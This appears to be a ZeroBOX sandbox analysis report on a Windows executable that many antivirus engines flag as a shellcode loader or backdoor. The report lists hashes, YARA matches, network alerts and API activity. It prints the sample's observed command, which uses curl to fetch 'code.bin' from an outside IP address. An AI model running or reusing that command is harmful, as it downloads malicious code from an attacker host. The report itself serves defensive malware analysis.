Summary | ZeroBOX

safe_shell.shc.exe

Tags: Generic Malware, Malicious Library, UPX, PE64, PE File, OS Processor Check

Category FILE
Machine s1_win7_x6401
Started July 19, 2024, 1:02 p.m.
Completed July 19, 2024, 1:04 p.m.
Size 1.7MB
Type MS-DOS executable, MZ for MS-DOS
MD5 0b6072d47b53fa8d3f9b28b449192dcc
SHA256 fb551ab74d9835dbaa9c305b206aa8ceec12ade2c82a947f9907d9284b3bb218
CRC32 1BBD9E21
ssdeep 24576:GkX39LoEpiCMd/OZBsarEyAB03srHdyyt72Ph1B4JhkeXQ4p+pbReM1/:XX34wFdh/
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE64 - (no description)
  • UPX_Zero - UPX packed file
  • Generic_Malware_Zero - Generic Malware
  • OS_Processor_Check_Zero - OS Processor Check

Domains (Name / Response / Post-Analysis Lookup)
No hosts contacted.

Hosts (IP Address / Status / Action)
47.128.226.30 Active Moloch

Suricata Alerts

Flow: TCP 192.168.56.101:49164 -> 47.128.226.30:80
SID: 2018752
Signature: ET HUNTING Generic .bin download from Dotted Quad
Category: Potentially Bad Traffic

Flow: TCP 192.168.56.101:49164 -> 47.128.226.30:80
SID: 2034567
Signature: ET HUNTING curl User-Agent to Dotted Quad
Category: Potentially Bad Traffic

Suricata TLS

No Suricata TLS

section .textbss
section .msvcjmc
section .00cfg
section _RDATA
packer Microsoft Visual C++ V8.0 (Debug)
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
0x5101ca

exception.instruction_r: ff 99 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.instruction: lcall ptr [rcx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5101ca
registers.r14: 2947160
registers.r15: 0
registers.rcx: 0
registers.rsi: 2947024
registers.r10: 1453503984
registers.rbx: 1453503984
registers.rsp: 2946928
registers.r11: 582
registers.r8: 2946744
registers.r9: 5308426
registers.rdx: 8796092837888
registers.r12: 2946736
registers.rbp: 5308426
registers.rdi: 108
registers.rax: 498139398
registers.r13: 2946744
status: 1 return: 0 repeated: 0

suspicious_features: Connection to IP address
suspicious_request: GET http://47.128.226.30/code.bin
request: GET http://47.128.226.30/code.bin
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000510000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
status: 1 return: 0 repeated: 0

cmdline C:\Windows\system32\cmd.exe /c curl http://47.128.226.30/code.bin
host 47.128.226.30

Antivirus (Vendor / Detection)
Bkav W64.AIDetectMalware
Lionic Trojan.Win32.Shellcode.m!c
Skyhigh BehavesLike.Win64.Generic.tt
ALYac Generic.Shellcode.Loader.Marte.X.9A1BD937
Cylance Unsafe
VIPRE Generic.Shellcode.Loader.Marte.X.9A1BD937
Sangfor Backdoor.Win32.Androm.Vaxf
BitDefender Generic.Shellcode.Loader.Marte.X.9A1BD937
Cybereason malicious.47b53f
Arcabit Generic.Shellcode.Loader.Marte.X.9A1BD937
Symantec ML.Attribute.HighConfidence
McAfee Artemis!0B6072D47B53
Avast MalwareX-gen [Trj]
Kaspersky Backdoor.Win32.Androm.vrxi
MicroWorld-eScan Generic.Shellcode.Loader.Marte.X.9A1BD937
Rising Backdoor.Androm!8.113 (C64:YzY0Osgm5GUpjuEX)
Emsisoft Generic.Shellcode.Loader.Marte.X.9A1BD937 (B)
F-Secure Backdoor.BDS/Androm.owaro
McAfeeD ti!FB551AB74D98
FireEye Generic.mg.0b6072d47b53fa8d
Sophos Mal/Swrort-Y
Ikarus Trojan.Nekark
Webroot W32.Trojan.Gen
Google Detected
Avira BDS/Androm.owaro
MAX malware (ai score=86)
Kingsoft Win32.Hack.Androm.vrxi
Gridinsoft Trojan.Win64.Packed.sa
Microsoft Trojan:Win32/Wacatac.B!ml
ZoneAlarm Backdoor.Win32.Androm.vrxi
GData Win64.Packed.Shellcode.C
Varist W64/ABTrojan.UUZN-8340
DeepInstinct MALICIOUS
Malwarebytes Generic.Malware/Suspicious
Panda Trj/Chgt.AD
TrendMicro-HouseCall TROJ_GEN.R002H09GI24
SentinelOne Static AI - Malicious PE
Fortinet PossibleThreat.PALLAS.H
AVG MalwareX-gen [Trj]
Paloalto generic.ml
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud Trojan:MSDOS/Shellcode.Labqct
dead_host 192.168.56.101:49166
dead_host 47.128.226.30:443